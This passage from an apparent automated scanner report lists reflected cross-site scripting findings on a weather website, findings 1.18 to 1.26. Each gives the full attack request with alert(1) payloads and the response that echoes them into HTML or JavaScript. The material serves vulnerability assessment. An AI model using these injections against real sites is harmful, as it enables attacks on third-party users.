fsr.a=1300988430780

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:19 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x00
X-Varnish: 1156434678
Date: Thu, 24 Mar 2011 17:40:49 GMT
Connection: keep-alive
Content-Length: 159999

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet6673d"><script>alert(1)</script>bb9577b79b5/metrics/" />
...[SNIP]...

1.18. http://www.weather.com/pagelet/metrics/ [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e1cb2"-alert(1)-"13022a50a91 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelete1cb2"-alert(1)-"13022a50a91/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:41:24 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x02
X-Varnish: 624705097
Date: Thu, 24 Mar 2011 17:40:54 GMT
Connection: keep-alive
Content-Length: 159916

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tch(/beta/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelete1cb2"-alert(1)-"13022a50a91/metrics/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011"
...[SNIP]...

1.19. http://www.weather.com/pagelet/metrics/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c2f9d"-alert(1)-"2fb1a1e8e87 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/metricsc2f9d"-alert(1)-"2fb1a1e8e87/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:59 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x02
X-Varnish: 1510934619
Date: Thu, 24 Mar 2011 17:40:59 GMT
Connection: keep-alive
Content-Length: 108349

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

...[SNIP]...
a/)) {
           serverEnv = ["beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "60990",
pageURL: "/pagelet/metricsc2f9d"-alert(1)-"2fb1a1e8e87/",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2011",

...[SNIP]...

1.20. http://www.weather.com/pagelet/metrics/ [cb parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/metrics/

Issue detail

The value of the cb request parameter is copied into the HTML document as plain text between tags. The payload 36fdf<script>alert(1)</script>1309f12375a was submitted in the cb parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet/metrics/?pageID=62287&modeID=default&cb=YAHOO.metrics.createMetrics36fdf<script>alert(1)</script>1309f12375a HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780

Response

HTTP/1.1 200 OK
Cache-Control: max-age=300
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:46 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x01
X-Varnish: 1097007573
Date: Thu, 24 Mar 2011 17:40:46 GMT
Connection: keep-alive
Content-Length: 326


YAHOO.metrics.createMetrics36fdf<script>alert(1)</script>1309f12375a({level1:"HOMEPAGE",
level2:"COMMON",
level3:"",
level4:"",
level5:"",
level6:"",
contentType:"",
detail:"",
title:"",
pagename:"/index.html",
ad_category:"homepage",
ad_family:"",
ad_chann
...[SNIP]...

1.21. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 1 is copied into the name of an HTML tag attribute. The payload 60e14><script>alert(1)</script>b10c9baf479 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec9760e14><script>alert(1)</script>b10c9baf479/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:04 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1156449751
Date: Thu, 24 Mar 2011 17:41:34 GMT
Connection: keep-alive
Content-Length: 160090

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec9760e14><script>alert(1)</script>b10c9baf479/bc/favicon2.ico" />
...[SNIP]...

1.22. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5d3c1"-alert(1)-"8e5fb02f59 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec975d3c1"-alert(1)-"8e5fb02f59/bc/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:08 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x06
X-Varnish: 2184735617
Date: Thu, 24 Mar 2011 17:41:38 GMT
Connection: keep-alive
Content-Length: 159983

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
"beta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec975d3c1"-alert(1)-"8e5fb02f59/bc/favicon2.ico",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/2
...[SNIP]...

1.23. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload acf42"><script>alert(1)</script>7682aafa52f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bcacf42"><script>alert(1)</script>7682aafa52f/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:13 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii3x00
X-Varnish: 624720906
Date: Thu, 24 Mar 2011 17:41:43 GMT
Connection: keep-alive
Content-Length: 160117

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<a
                           href="/weather/map/interactive/bcacf42"><script>alert(1)</script>7682aafa52f/favicon2.ico" from="nav_secondary" >
...[SNIP]...

1.24. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into the name of an HTML tag attribute. The payload 7d1ec><script>alert(1)</script>a55ddb85131 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc7d1ec><script>alert(1)</script>a55ddb85131/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:11 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x06
X-Varnish: 1510948709
Date: Thu, 24 Mar 2011 17:41:41 GMT
Connection: keep-alive
Content-Length: 160136

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
<link rel="canonical" href="http://www.weather.com/pagelet8cd82"-alert("XSS")-"370523ec97/bc7d1ec><script>alert(1)</script>a55ddb85131/favicon2.ico" />
...[SNIP]...

1.25. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 667fa"-alert(1)-"acc2bbdafe0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc667fa"-alert(1)-"acc2bbdafe0/favicon2.ico HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:42:18 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii1x01
X-Varnish: 1156454637
Date: Thu, 24 Mar 2011 17:41:48 GMT
Connection: keep-alive
Content-Length: 160042

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
ta:",replEnvStr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

wx.config.page = {
pageId: "62287",
pageURL: "/pagelet8cd82"-alert("XSS")-"370523ec97/bc667fa"-alert(1)-"acc2bbdafe0/favicon2.ico",
locID: ("" === "") ? (Cookie.get("LocID")===null) ? "" : Cookie.get("LocID") : "",
locType: "",
locName: "",
countryCode: "",
serverdate: "3/24/2
...[SNIP]...

1.26. http://www.weather.com/pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4f2ca"-alert(1)-"67dc3956ab6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /pagelet8cd82%22-alert(%22XSS%22)-%22370523ec97/bc/favicon2.ico4f2ca"-alert(1)-"67dc3956ab6 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; RMID=c245359a4d8b7f55; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; s_pers=%20s_nr%3D1300988478489%7C1303580478489%3B; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A7%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fpagelet8cd82%5C%22-alert(%5C%22XSS%5C%22)-%5C%22370523ec97%2Fbc%2F56967%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A7%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988480444%7D

Response

HTTP/1.1 200 OK
Cache-Control: max-age=30
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:43:46 GMT
Server: Apache
Vary: Accept-Encoding
SVRNAME: wxii2x06
X-Varnish: 2184767922
Date: Thu, 24 Mar 2011 17:43:16 GMT
Connection: keep-alive
Content-Length: 160046

<!DOCTYPE HTML>


                                                                                                                                                   <html lang="en">
<head>


<TITLE>National and Local W
...[SNIP]...
tr].join("");
       } else {
            serverEnv = ["live:",replEnvStr].join("");
       }

